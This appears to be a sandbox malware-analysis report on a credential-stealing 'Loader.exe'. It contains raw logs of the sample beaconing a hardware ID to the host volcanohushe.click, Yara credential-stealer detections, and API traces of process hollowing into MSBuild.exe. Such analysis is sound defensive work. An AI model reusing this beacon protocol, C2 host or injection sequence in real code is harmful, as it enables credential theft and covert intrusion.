2024-12-24 01:17:26 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 85 Host: volcanohushe.click
2024-12-24 01:17:26 UTC	85	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c 26 6a 3d 26 68 77 69 64 3d 45 38 38 37 44 30 42 36 41 35 33 41 45 45 33 36 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 Data Ascii: act=get_message&ver=4.0&lid=pqZnKP--Z2xsZXhl&j=&hwid=E887D0B6A53AEE368246926E533C64D7
2024-12-24 01:17:27 UTC	1129	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 01:17:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=p8utlv6iruk5l4f608drlm1fir; expires=Fri, 18 Apr 2025 19:04:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5omvH10W34DQK9M7y1phkkUFk5kqtuttCT6ZmiYIr5e2JuOG8o1zUpeAf0IGLEV%2BOBSj4PcoG5vCvUNBbr2YxORSGZN2vyWrb8H0%2F5zjTmvVvsBrd6KMom%2FJiSBV%2Flt7zIwv9ec%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6cc072b8410f5f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1485&min_rtt=1481&rtt_var=565&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=987&delivery_rate=1921052&cwnd=234&unsent_bytes=0&cid=cc5cf3c716f39256&ts=779&x=0"
2024-12-24 01:17:27 UTC	240	IN	Data Raw: 62 65 65 0d 0a 4a 32 78 47 6c 68 6d 4d 43 6f 78 37 55 69 6c 67 63 69 69 62 6f 6b 79 6f 72 38 31 62 73 4a 38 74 39 74 62 41 67 5a 49 47 73 78 78 38 46 32 54 77 62 61 34 77 76 56 64 77 54 45 4a 49 47 62 65 41 4b 49 71 56 37 78 2f 45 35 56 6d 6b 67 4b 7a 79 75 57 7a 6a 56 46 38 76 50 50 52 53 36 6d 50 30 4c 77 4a 66 4b 41 51 44 33 63 59 4a 33 4d 65 35 48 76 37 54 54 70 4b 39 73 62 44 6b 64 4e 39 59 54 78 77 51 30 45 37 4c 63 4c 6f 32 61 6e 6b 6c 50 6d 62 6f 30 6d 66 6b 36 59 42 77 69 50 70 78 32 65 4b 57 73 63 45 30 39 43 31 32 58 44 4c 75 4b 39 39 34 32 31 41 6e 65 46 63 52 48 38 37 30 46 73 72 2f 6f 69 48 49 70 33 79 46 35 4c 6e 76 70 6e 58 6d 5a 68 41 55 63 63 6f 32 35 46 4c 65 4e 77 74 4c 4d 6a 5a 37 71 4f 6f Data Ascii: beeJ2xGlhmMCox7Uilgciibokyor81bsJ8t9tbAgZIGsxx8F2Twba4wvVdwTEJIGbeAKIqV7x/E5VmkgKzyuWzjVF8vPPRS6mP0LwJfKAQD3cYJ3Me5Hv7TTpK9sbDkdN9YTxwQ0E7LcLo2anklPmbo0mfk6YBwiPpx2eKWscE09C12XDLuK99421AneFcRH870Fsr/oiHIp3yF5LnvpnXmZhAUcco25FLeNwtLMjZ7qOo
2024-12-24 01:17:27 UTC	1369	IN	Data Raw: 56 30 64 75 76 62 59 58 65 59 4c 69 4f 6b 37 44 38 58 34 74 41 43 46 73 72 38 46 71 2b 55 72 6b 31 50 45 55 71 4f 47 4f 72 7a 48 6e 74 32 61 73 35 69 50 6c 4f 6c 49 72 76 75 64 52 56 78 58 34 58 49 68 79 67 52 61 4e 44 74 42 77 33 65 31 59 69 63 50 37 48 4f 50 6e 5a 75 53 2f 45 74 47 65 46 75 72 48 72 38 47 37 37 55 52 56 65 41 61 64 59 34 44 50 30 53 52 42 62 4d 30 52 64 7a 39 4e 38 77 50 79 48 41 64 4c 50 51 6f 79 75 2b 4e 44 68 4e 49 74 79 45 78 39 30 70 57 37 30 65 4d 51 54 43 6e 67 73 4b 30 72 4a 35 68 57 62 35 35 63 51 78 50 30 62 77 35 4b 7a 2b 2b 5a 55 35 58 41 66 52 79 7a 47 55 66 52 4a 39 68 6b 5a 54 77 6b 4b 63 4d 76 55 46 4e 36 45 69 7a 2f 31 30 55 57 43 6b 4c 54 4e 38 57 4c 59 62 52 59 61 4e 50 31 51 76 30 57 39 50 51 56 2b 47 6b 52 6c 6f 38 Data Ascii: V0duvbYXeYLiOk7D8X4tACFsr8Fq+Urk1PEUqOGOrzHnt2as5iPlOlIrvudRVxX4XIhygRaNDtBw3e1YicP7HOPnZuS/EtGeFurHr8G77URVeAadY4DP0SRBbM0Rdz9N8wPyHAdLPQoyu+NDhNItyEx90pW70eMQTCngsK0rJ5hWb55cQxP0bw5Kz++ZU5XAfRyzGUfRJ9hkZTwkKcMvUFN6Eiz/10UWCkLTN8WLYbRYaNP1Qv0W9PQV+GkRlo8
2024-12-24 01:17:27 UTC	1369	IN	Data Raw: 2b 69 4f 48 77 77 4b 65 6a 70 4c 4e 79 32 54 68 57 48 52 66 44 73 78 53 2b 47 69 36 54 68 5a 64 47 67 5a 36 7a 63 34 2f 67 38 57 64 45 38 6a 63 56 35 53 64 70 75 6a 71 55 75 4e 71 62 78 70 74 30 48 33 4a 66 75 51 50 46 32 63 73 45 55 7a 77 30 33 33 65 33 61 59 55 67 39 41 63 73 49 47 58 2b 36 52 4c 69 33 70 69 49 41 6a 6c 61 61 64 47 79 6a 5a 35 45 51 55 75 42 36 2f 30 66 50 75 64 69 6d 76 68 72 31 6d 4f 35 4a 50 7a 78 53 33 47 54 52 41 50 63 63 4e 50 31 6d 6a 63 46 43 68 52 57 43 4e 62 71 64 73 69 6e 4e 79 59 49 59 66 6e 47 71 72 35 71 4e 6e 41 53 75 70 2b 64 53 67 56 70 56 48 57 51 66 67 5a 5a 42 77 6b 42 6c 4c 76 38 42 72 45 33 4f 59 78 34 4e 64 56 74 61 79 69 79 76 52 76 79 30 68 33 47 67 37 67 4d 73 70 75 79 51 38 36 58 53 55 38 5a 50 6a 47 4a 39 6d Data Ascii: +iOHwwKejpLNy2ThWHRfDsxS+Gi6ThZdGgZ6zc4/g8WdE8jcV5SdpujqUuNqbxpt0H3JfuQPF2csEUzw033e3aYUg9AcsIGX+6RLi3piIAjlaadGyjZ5EQUuB6/0fPudimvhr1mO5JPzxS3GTRAPccNP1mjcFChRWCNbqdsinNyYIYfnGqr5qNnASup+dSgVpVHWQfgZZBwkBlLv8BrE3OYx4NdVtayiyvRvy0h3Gg7gMspuyQ86XSU8ZPjGJ9m
2024-12-24 01:17:27 UTC	83	IN	Data Raw: 2f 78 56 7a 6f 65 7a 73 4e 67 79 35 79 30 66 56 41 66 38 61 38 35 6d 2b 44 6b 65 63 41 49 6f 5a 65 33 4a 4f 2b 66 6c 6e 52 50 6d 7a 6e 57 6c 6d 35 50 30 2f 30 2f 71 4c 30 30 49 43 2f 31 59 35 6c 37 55 51 6a 4d 43 53 30 56 39 72 75 38 39 36 2b 0d 0a Data Ascii: /xVzoezsNgy5y0fVAf8a85m+DkecAIoZe3JO+flnRPmznWlm5P0/0/qL00IC/1Y5l7UQjMCS0V9ru896+
2024-12-24 01:17:27 UTC	1369	IN	Data Raw: 32 61 62 32 0d 0a 47 67 4c 4d 62 71 47 37 69 38 6c 4c 6a 61 4e 2f 68 4e 63 67 30 43 2b 45 2f 41 52 2b 55 4f 61 6d 6f 72 45 55 44 63 34 42 2f 38 2b 49 38 68 2b 39 46 33 73 2b 4f 7a 32 4f 4e 58 2b 69 30 4d 56 41 72 61 53 73 4e 41 33 69 6f 5a 47 53 34 33 45 4e 62 34 42 73 72 4f 6f 51 76 78 70 33 2b 56 34 5a 54 4c 33 46 79 43 4a 48 63 69 50 39 42 64 2b 31 44 65 41 32 4e 49 43 78 63 63 37 2b 73 51 68 2f 69 42 45 4e 72 37 58 4a 79 46 6d 4c 4c 42 63 73 5a 66 5a 53 45 78 6f 6e 2b 31 51 2b 64 4b 4e 55 70 57 4b 30 37 74 6b 54 72 30 67 49 68 73 31 4e 4d 59 73 70 37 34 73 4d 74 69 32 47 30 57 47 6a 54 36 64 74 51 2f 79 69 49 46 47 78 68 42 53 64 62 31 4e 4a 72 35 70 77 6a 43 30 6e 75 6c 72 36 66 6e 79 46 2f 61 57 58 49 47 41 61 52 39 35 33 36 34 50 79 52 54 43 51 74 Data Ascii: 2ab2GgLMbqG7i8lLjaN/hNcg0C+E/AR+UOamorEUDc4B/8+I8h+9F3s+Oz2ONX+i0MVAraSsNA3ioZGS43ENb4BsrOoQvxp3+V4ZTL3FyCJHciP9Bd+1DeA2NICxcc7+sQh/iBENr7XJyFmLLBcsZfZSExon+1Q+dKNUpWK07tkTr0gIhs1NMYsp74sMti2G0WGjT6dtQ/yiIFGxhBSdb1NJr5pwjC0nulr6fnyF/aWXIGAaR95364PyRTCQt
2024-12-24 01:17:27 UTC	1369	IN	Data Raw: 63 4c 65 74 79 7a 71 30 52 6d 34 76 36 4c 6b 6f 57 44 55 55 45 77 56 47 72 6c 65 36 56 76 67 4e 51 4a 78 42 7a 39 39 2b 74 52 36 6d 4f 57 68 62 75 79 77 57 4a 4f 2f 73 76 6a 66 66 49 70 41 43 43 63 76 2b 48 2b 35 57 2b 34 35 5a 6e 68 52 43 30 4c 53 6b 52 62 46 77 76 55 70 2f 2f 70 59 70 4f 47 55 38 4e 73 33 35 43 34 66 47 42 44 48 63 38 5a 51 37 6b 30 6c 51 78 59 42 51 65 33 59 65 2f 53 41 70 57 76 32 32 45 62 44 6b 4a 53 7a 6f 30 76 4b 55 58 51 48 41 4e 46 74 70 31 4c 34 4b 51 52 48 4e 44 4e 62 37 4a 59 44 6e 65 61 35 61 74 66 37 59 6f 62 39 6f 65 6d 67 58 39 41 72 51 79 42 7a 30 6c 47 30 4f 39 55 66 4f 56 68 52 42 46 72 32 37 41 54 36 2f 34 6f 31 77 4e 30 59 7a 34 4b 30 79 61 56 79 33 33 68 4f 48 6e 47 68 62 37 6c 65 79 42 6b 57 63 53 4d 6c 48 64 72 44 Data Ascii: cLetyzq0Rm4v6LkoWDUUEwVGrle6VvgNQJxBz99+tR6mOWhbuywWJO/svjffIpACCcv+H+5W+45ZnhRC0LSkRbFwvUp//pYpOGU8Ns35C4fGBDHc8ZQ7k0lQxYBQe3Ye/SApWv22EbDkJSzo0vKUXQHANFtp1L4KQRHNDNb7JYDnea5atf7Yob9oemgX9ArQyBz0lG0O9UfOVhRBFr27AT6/4o1wN0Yz4K0yaVy33hOHnGhb7leyBkWcSMlHdrD
2024-12-24 01:17:27 UTC	1369	IN	Data Raw: 34 2f 67 61 68 72 68 62 4b 73 32 4b 4e 4e 79 56 70 39 44 79 6e 65 4b 39 56 70 75 78 38 65 48 43 51 36 45 4b 72 37 4b 4d 50 65 2f 43 33 43 38 30 4b 75 34 34 62 46 31 6c 48 4c 4c 30 52 55 45 65 34 72 32 6c 50 67 53 69 64 73 41 67 4e 42 6f 35 4e 35 37 70 2b 65 44 49 62 30 54 70 37 69 2b 4f 62 39 62 38 4e 62 64 52 6f 41 38 46 4c 5a 5a 4f 38 4a 41 6e 34 6d 43 77 50 59 39 58 37 42 77 66 6b 6f 35 64 42 78 32 5a 43 71 34 36 4e 6a 34 53 35 44 41 42 7a 39 61 4d 4a 62 7a 30 73 42 51 69 56 45 55 75 4c 6f 4a 38 4c 4e 6a 42 72 79 30 6c 72 43 67 76 50 46 7a 69 6e 33 52 47 45 66 66 38 46 42 34 48 7a 51 56 42 63 65 45 6a 35 36 37 38 38 64 77 50 6d 38 44 75 66 75 63 64 6d 6b 71 38 50 7a 4c 59 74 32 46 43 63 38 70 32 33 30 55 73 6f 33 48 46 77 52 50 56 72 4c 38 67 50 62 2b Data Ascii: 4/gahrhbKs2KNNyVp9DyneK9Vpux8eHCQ6EKr7KMPe/C3C80Ku44bF1lHLL0RUEe4r2lPgSidsAgNBo5N57p+eDIb0Tp7i+Ob9b8NbdRoA8FLZZO8JAn4mCwPY9X7Bwfko5dBx2ZCq46Nj4S5DABz9aMJbz0sBQiVEUuLoJ8LNjBry0lrCgvPFzin3RGEff8FB4HzQVBceEj56788dwPm8Dufucdmkq8PzLYt2FCc8p230Uso3HFwRPVrL8gPb+
2024-12-24 01:17:27 UTC	1369	IN	Data Raw: 6f 53 49 79 66 68 64 58 45 62 73 41 33 53 7a 51 50 70 43 2f 6d 61 4d 63 64 4f 31 45 30 4f 6b 6e 52 69 58 37 66 36 34 67 63 2b 74 4a 6f 75 4a 71 6a 37 38 64 4a 68 58 4e 46 41 51 6a 65 4d 72 52 61 77 43 67 77 47 41 67 69 55 4e 48 7a 4e 50 72 2f 71 47 76 49 32 55 53 6c 76 62 6e 72 35 30 79 44 53 78 49 74 44 66 6c 36 34 6a 76 34 48 53 68 69 44 53 73 59 38 63 30 6d 36 2b 79 6c 63 50 37 4a 56 4c 69 6a 72 37 50 72 61 49 64 76 63 68 52 79 32 56 66 44 58 4e 6f 4c 46 30 39 59 48 48 4c 4a 36 33 37 66 6d 36 6c 69 31 2b 39 48 70 62 53 78 30 75 59 7a 39 6c 35 45 47 33 4c 61 59 50 70 66 77 67 6b 72 55 54 51 36 59 64 62 73 41 64 44 39 68 43 2f 59 70 6d 61 6b 68 62 48 5a 2b 56 50 77 4e 32 49 4a 41 76 70 64 76 30 33 6a 50 44 41 59 45 78 46 68 72 4a 49 31 2b 38 53 2b 47 6f Data Ascii: oSIyfhdXEbsA3SzQPpC/maMcdO1E0OknRiX7f64gc+tJouJqj78dJhXNFAQjeMrRawCgwGAgiUNHzNPr/qGvI2USlvbnr50yDSxItDfl64jv4HShiDSsY8c0m6+ylcP7JVLijr7PraIdvchRy2VfDXNoLF09YHHLJ637fm6li1+9HpbSx0uYz9l5EG3LaYPpfwgkrUTQ6YdbsAdD9hC/YpmakhbHZ+VPwN2IJAvpdv03jPDAYExFhrJI1+8S+Go
2024-12-24 01:17:27 UTC	1369	IN	Data Raw: 76 36 54 5a 70 6a 2f 38 61 55 30 55 45 64 4a 74 39 6e 37 75 4d 51 34 47 46 6a 42 72 79 2b 73 65 32 38 57 76 45 4e 62 32 62 4a 72 6c 70 36 72 67 4d 2f 31 31 53 68 51 4b 2f 53 75 39 54 39 42 55 4f 6c 6f 75 42 6e 76 4d 35 78 43 48 36 5a 51 6f 32 73 39 61 68 37 57 49 34 76 68 6b 77 6c 4a 55 48 47 33 61 58 38 45 7a 77 68 31 6c 48 69 73 46 54 4f 4c 78 4a 38 37 6d 2f 48 43 44 36 6b 4b 4f 35 4c 72 4f 32 6d 72 6a 64 31 55 49 45 63 5a 71 39 6e 4b 38 53 47 74 6c 42 52 67 59 37 64 45 6b 32 39 66 36 42 35 2f 33 48 4c 69 75 6f 75 69 35 66 74 46 51 62 69 73 56 78 6c 2f 70 57 39 42 55 59 33 77 34 43 47 2b 71 36 33 79 51 36 59 41 6f 38 66 56 78 32 61 65 6f 74 2b 74 2b 36 6b 41 49 42 6a 50 75 65 4d 74 75 77 45 34 57 59 56 68 44 63 66 2f 4a 50 5a 6e 5a 76 7a 62 32 37 6e 32 Data Ascii: v6TZpj/8aU0UEdJt9n7uMQ4GFjBry+se28WvENb2bJrlp6rgM/11ShQK/Su9T9BUOlouBnvM5xCH6ZQo2s9ah7WI4vhkwlJUHG3aX8Ezwh1lHisFTOLxJ87m/HCD6kKO5LrO2mrjd1UIEcZq9nK8SGtlBRgY7dEk29f6B5/3HLiuoui5ftFQbisVxl/pW9BUY3w4CG+q63yQ6YAo8fVx2aeot+t+6kAIBjPueMtuwE4WYVhDcf/JPZnZvzb27n2

Target ID:	0
Start time:	20:17:02
Start date:	23/12/2024
Path:	C:\Users\user\Desktop\Loader.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Loader.exe"
Imagebase:	0xeb0000
File size:	540'160 bytes
MD5 hash:	245D1F68F4E8CAFFB294D206958761E5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	20:17:02
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	20:17:02
Start date:	23/12/2024
Path:	C:\Users\user\Desktop\Loader.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Loader.exe"
Imagebase:	0xeb0000
File size:	540'160 bytes
MD5 hash:	245D1F68F4E8CAFFB294D206958761E5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2298733813.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2324979359.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2298858534.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2299868440.0000000000AAF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	1.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	32

Executed Functions

Function 00EE619E Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00EE6110,00EE6100), ref: 00EE6334
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00EE6347
Wow64GetThreadContext.KERNEL32(0000009C,00000000), ref: 00EE6365
ReadProcessMemory.KERNELBASE(00000090,?,00EE6154,00000004,00000000), ref: 00EE6389
VirtualAllocEx.KERNELBASE(00000090,?,?,00003000,00000040), ref: 00EE63B4
WriteProcessMemory.KERNELBASE(00000090,00000000,?,?,00000000,?), ref: 00EE640C
WriteProcessMemory.KERNELBASE(00000090,00400000,?,?,00000000,?,00000028), ref: 00EE6457
WriteProcessMemory.KERNELBASE(00000090,?,?,00000004,00000000), ref: 00EE6495
Wow64SetThreadContext.KERNEL32(0000009C,02350000), ref: 00EE64D1
ResumeThread.KERNELBASE(0000009C), ref: 00EE64E0

Strings

SetThreadContext, xrefs: 00EE62C2
ResumeThread, xrefs: 00EE62D8
ReadProcessMemory, xrefs: 00EE6289
WriteProcessMemory, xrefs: 00EE62AF
VirtualAllocEx, xrefs: 00EE629C
GetThreadContext, xrefs: 00EE6276
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 00EE6333
TerminateProcess, xrefs: 00EE63C3
CreateProcessW, xrefs: 00EE6250
VirtualAlloc, xrefs: 00EE6263
ress, xrefs: 00EE6226
Load, xrefs: 00EE61DA
GetP, xrefs: 00EE621E
aryA, xrefs: 00EE61E2

Memory Dump Source

Source File: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-3857624555
Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction ID: a9607cb95fe177f7bedc311124a55cf76f7294d3cd02a7a1ac97c20bd32a3e63
Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction Fuzzy Hash: 7AB1097264028AAFDB60CF69CC80BDA73A5FF88754F158124EA0CAB341D774FA51CB94

Function 00ECBD42 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,C4C39003,?,00ECBE51,?,?,00000000), ref: 00ECBE03

Strings

ext-ms-, xrefs: 00ECBDAD
api-ms-, xrefs: 00ECBD99

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 82024604d199dd5cac31c9ad8ed3cf070c26331d34eebaf897184ee96ac08357
Instruction ID: 00f14e50d429b98270f2e89d429598dc420375b191302aa854fb6704c3708126
Opcode Fuzzy Hash: 82024604d199dd5cac31c9ad8ed3cf070c26331d34eebaf897184ee96ac08357
Instruction Fuzzy Hash: 9C210871A01259ABD7219B66EE82F9A3B589B01764F241128FD17BB2D0E731ED06C6D0

Function 00EB1860 Relevance: 9.2, APIs: 6, Instructions: 162
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 00EB18E3
GetFileSize.KERNEL32 ref: 00EB1912
CloseHandle.KERNEL32 ref: 00EB192E

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: f641986523fa2dc58d0f0dfaf051f26a3bb2b65ebaad19036c1dafc411d8bd86
Instruction ID: f60a6dfef45cca3a45d4dcb6ffcf7d20f63dc491b343636dde45050403ba8def
Opcode Fuzzy Hash: f641986523fa2dc58d0f0dfaf051f26a3bb2b65ebaad19036c1dafc411d8bd86
Instruction Fuzzy Hash: 1071A0B0D04248CFCB00EFA8D59879EBBF0BF48314F508969E499AB380D734A949CF52

Function 00EBA4D0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 477
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strcspn.LIBCMT ref: 00EBA631
_strcspn.LIBCMT ref: 00EBA65F

Strings

@, xrefs: 00EBA92F

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: _strcspn
String ID: @
API String ID: 3709121408-2766056989
Opcode ID: 4e14f1db73e6d6f03a6d93815ab2e9c8cb84b4852a92b150e120b0b32b1ceccf
Instruction ID: d915e88e0e57bc4c7a9e69fe1553126a0f519625c3905322df0f3475e7a47fdc
Opcode Fuzzy Hash: 4e14f1db73e6d6f03a6d93815ab2e9c8cb84b4852a92b150e120b0b32b1ceccf
Instruction Fuzzy Hash: 3232C3B49042698FCB24DF64C981ADEFBF5BF48300F0585AAE849A7351D734AE85CF91

Function 00EB1700 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNELBASE ref: 00EB176B
VirtualProtect.KERNELBASE ref: 00EB181B

Strings

@, xrefs: 00EB180F

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: ConsoleFreeProtectVirtual
String ID: @
API String ID: 621788221-2766056989
Opcode ID: f4e2a90f895a88d28fa7986496b88ae6600d33111954812a58d2fd5a3476ad51
Instruction ID: e5114420890eee9b9a3334b91579d0d1e8ff7909341aca58deef997b2a6f1b7e
Opcode Fuzzy Hash: f4e2a90f895a88d28fa7986496b88ae6600d33111954812a58d2fd5a3476ad51
Instruction Fuzzy Hash: E941DDB0D002089FCB04EFA9E8946DEBBF0AF48354F10845AE858AB350D775A944CF91

Function 00EC481D Relevance: 4.6, APIs: 3, Instructions: 51
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?,Function_00014935,00000000,?,?), ref: 00EC4866
GetLastError.KERNEL32(?,00000000,00000000,?,00EBB58D), ref: 00EC4872
__dosmaperr.LIBCMT ref: 00EC4879

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
